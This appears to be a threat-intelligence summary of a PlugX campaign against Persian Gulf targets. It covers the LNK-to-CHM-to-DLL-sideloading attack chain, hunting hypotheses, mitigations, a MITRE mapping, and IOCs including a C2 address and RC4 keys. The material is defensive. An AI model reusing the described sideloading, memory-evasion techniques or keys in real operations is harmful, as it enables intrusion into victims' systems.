China-nexus Group Targets Persian Gulf Region | ThreatLabz

Key Takeaways

• A China-nexus threat actor (likely Mustang Panda) targeted Persian Gulf region countries using Middle East conflict lures.
• The multi-stage attack chain utilizes LNK, CHM, and TAR files to deploy a PlugX backdoor variant.
• The shellcode and PlugX backdoor employ heavy obfuscation, including Control Flow Flattening (CFF) and Mixed Boolean Arithmetic (MBA).
• The PlugX variant supports HTTPS for C2 communication and DNS-over-HTTPS (DOH) for domain resolution.
• The malware uses corrupted MZ/PE headers and reflective DLL injection to evade memory forensics.

Affected Systems

• Windows

Attack Chain

The attack begins with a ZIP archive containing a malicious LNK file masquerading as a PDF. When executed, the LNK uses cURL to download a CHM file, which is decompiled using hh.exe to extract a decoy PDF, a second LNK, and a TAR archive. The second LNK extracts the TAR archive and executes a legitimate Baidu executable (ShellFolder.exe) to sideload a malicious DLL (ShellFolderDepend.dll). This DLL decrypts and executes heavily obfuscated shellcode (Shelter.ex), which reflectively loads a PlugX backdoor into memory after corrupting its own MZ/PE headers to evade memory forensics.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No

The article does not provide specific detection rules (YARA, Sigma, etc.), but details extensive behavioral indicators and IOCs for custom rule creation.

Detection Engineering Assessment

EDR Visibility: Medium — EDR can detect the initial LNK execution, cURL downloads, hh.exe decompilation, and reg.exe persistence. However, the reflective DLL injection and corrupted MZ/PE headers may evade some memory scanning. Network Visibility: Medium — Network telemetry can spot the initial CHM download and HTTPS C2 traffic, but the use of DNS-over-HTTPS (DoH) and custom RC4 encryption for C2 traffic complicates deep packet inspection. Detection Difficulty: Hard — The threat actor uses heavy obfuscation (CFF, MBA), reflective loading, memory forensics evasion (corrupted PE headers), and legitimate binaries (hh.exe, BaiduNetdisk) for sideloading.

Required Log Sources

• Process Creation (Event ID 4688 / Sysmon 1)
• File Creation (Sysmon 11)
• Registry Modifications (Sysmon 12/13/14)
• Network Connections (Sysmon 3)

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for LNK files executing cURL to download files, followed by the execution of hh.exe with the -decompile flag.	Process Creation	Initial Access / Execution	Low
Identify instances of ShellFolder.exe executing with the '--path a' argument, especially when launched from the AppData directory.	Process Creation	Execution	Low
Monitor for reg.exe adding run keys pointing to executables in the AppData directory, particularly those named BaiNetdisk.	Process Creation / Registry Modification	Persistence	Low
Detect the creation of a service named 'Microsoft Desktop Dialog Broker' or registry keys named 'DesktopDialogBroker'.	Registry Modification / System Event Logs	Persistence	Low

Control Gaps

• Memory forensics tools relying on intact MZ/PE headers
• Network inspection tools unable to decrypt DoH traffic

Key Behavioral Indicators

• hh.exe -decompile execution
• ShellFolder.exe --path a execution
• BaiNetdisk Run key creation
• Corrupted MZ/PE headers in memory

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Block the identified C2 IP (91.193.17.117) and CHM download domain (www.360printsol.com).
• Search endpoints for the presence of ShellFolderDepend.dll and Shelter.ex in AppData.

Infrastructure Hardening

• Restrict the execution of hh.exe (HTML Help) if not required for business operations.
• Implement application control to block unauthorized binaries from executing in %AppData%.

User Protection

• Configure email gateways to block or quarantine ZIP archives containing LNK files.
• Deploy EDR solutions configured to detect DLL sideloading and reflective code loading.

Security Awareness

• Train users to identify suspicious LNK files masquerading as PDFs.
• Warn employees about social engineering lures related to geopolitical events, specifically the Middle East conflict.

MITRE ATT&CK Mapping

• T1587.001 - Develop Capabilities: Malware
• T1588.001 - Resource Development: Obtain Capabilities, Malware
• T1608.001 - Resource Development: Stage Capabilities: Upload Malware
• T1566 - Initial Access: Phishing
• T1204.002 - Execution: User Execution: Malicious File
• T1059.003 - Execution: Command and Scripting Interpreter: Windows Command Shell
• T1106 - Execution: Native API
• T1547.001 - Persistence: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
• T1543.003 - Persistence: Create or Modify System Process: Windows Service
• T1548.002 - Privilege Escalation: Abuse Elevation Control Mechanism: Bypass User Account Control
• T1036.007 - Defense Evasion: Masquerading: Double File Extension
• T1036.005 - Defense Evasion: Masquerading: Match Legitimate Resource Name or Location
• T1140 - Defense Evasion: Deobfuscate/Decode Files or Information
• T1036.004 - Defense Evasion: Masquerading: Masquerade Task or Service
• T1218.001 - Defense Evasion: System Binary Proxy Execution: Compiled HTML File
• T1620 - Defense Evasion: Reflective Code Loading
• T1574.001 - Defense Evasion: Hijack Execution Flow: DLL
• T1027 - Defense Evasion: Obfuscated Files or Information
• T1027.002 - Defense Evasion: Obfuscated Files or Information: Software Packing
• T1027.007 - Defense Evasion: Obfuscated Files or Information: Dynamic API Resolution
• T1027.009 - Defense Evasion: Obfuscated Files or Information: Embedded Payloads
• T1027.013 - Defense Evasion: Obfuscated Files or Information: Encrypted/Encoded File
• T1027.015 - Defense Evasion: Obfuscated Files or Information: Compression
• T1027.016 - Defense Evasion: Obfuscated Files or Information: Junk Code Insertion
• T1082 - Discovery: System Information Discovery
• T1518.001 - Discovery: Software Discovery: Security Software Discovery
• T1083 - Discovery: File and Directory Discovery
• T1071.001 - Command and Control: Application Layer Protocol: Web Protocols
• T1572 - Command and Control: Protocol Tunneling
• T1090.001 - Command and Control: Proxy: Internal Proxy
• T1573.001 - Command and Control: Encrypted Channel: Symmetric Cryptography
• T1573.002 - Command and Control: Encrypted Channel: Asymmetric Cryptography
• T1095 - Command and Control: Non-Application Layer Protocol
• T1105 - Command and Control: Ingress Tool Transfer

Additional IOCs

• Domains:
  • www[.]360printsol[[.]]com - Domain hosting the malicious CHM file.
• Urls:
  • hxxps://91[.]193[.]17[[.]]117:443 - PlugX C2 URL.
• Registry Keys:
  • DesktopDialogBroker - PlugX registry name used for persistence.
• File Paths:
  • %AppData%\BaiduNetdisk\ShellFolder.exe - Path of the legitimate Baidu executable used for DLL sideloading.
  • %ProgramFiles%\Microsoft\Display Broker - Persistence path used by the PlugX backdoor.
• Command Lines:
  • Purpose: Download malicious CHM file and extract contents | Tools: curl.exe, hh.exe | Stage: Initial Access / Execution | hh.exe -decompile
  • Purpose: Establish persistence via Run key | Tools: reg.exe | Stage: Persistence
  • Purpose: Execute sideloading host binary | Tools: ShellFolder.exe | Stage: Execution | ShellFolder.exe --path a
• Other:
  • Microsoft Desktop Dialog Broker - Malicious service display name used by PlugX.
  • VD*1^N1OCLtAGM$U - PlugX C2 Traffic RC4 Key.
  • qwedfgx202211 - PlugX Configuration RC4 Key.
  • 20260301@@@ - Shellcode loader RC4 Key.